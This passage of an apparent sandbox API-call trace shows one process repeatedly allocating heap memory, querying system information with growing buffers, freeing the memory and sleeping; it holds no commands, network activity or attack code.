hHeap=0x2560000) returned 1 [0300.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0300.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0300.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0300.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0300.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.580] Sleep (dwMilliseconds=0x110) [0300.603] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0300.603] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.604] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0300.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0300.604] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0300.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0300.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0300.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0300.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0300.616] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.616] Sleep (dwMilliseconds=0x110) [0300.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0300.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0300.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0300.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0300.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0300.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0300.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0300.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0300.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.626] Sleep (dwMilliseconds=0x110) [0300.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0300.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0300.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0300.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0300.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0300.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0300.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0300.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0300.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.642] Sleep (dwMilliseconds=0x110) [0300.665] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0300.665] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0300.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0300.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0300.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0300.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0300.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0300.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0300.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.672] Sleep (dwMilliseconds=0x110) [0300.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0300.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0300.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0300.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0300.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0300.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0300.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0300.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0300.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.694] Sleep (dwMilliseconds=0x110) [0300.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0300.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0300.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0300.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0300.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0300.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0300.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0300.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0300.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.724] Sleep (dwMilliseconds=0x110) [0300.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0300.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0300.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0300.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0300.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0300.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0300.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0300.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0300.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.738] Sleep (dwMilliseconds=0x110) [0300.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0300.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0300.820] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0300.820] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.821] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0300.821] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0300.821] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.822] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0300.822] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0300.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0300.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.823] Sleep (dwMilliseconds=0x110) [0300.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0300.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0300.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0300.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0300.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0300.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0300.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0300.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0300.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.832] Sleep (dwMilliseconds=0x110) [0300.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0300.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0300.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0300.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0300.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0300.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0300.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0300.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0300.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.847] Sleep (dwMilliseconds=0x110) [0300.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0300.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0300.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0300.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0300.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0300.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0300.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0300.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0300.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.859] Sleep (dwMilliseconds=0x110) [0300.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0300.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0300.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0300.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0300.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0300.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0300.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0300.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0300.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.876] Sleep (dwMilliseconds=0x110) [0300.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0300.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0300.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0300.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0300.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0300.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0300.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0300.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0300.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.892] Sleep (dwMilliseconds=0x110) [0300.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0300.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0300.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0300.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, 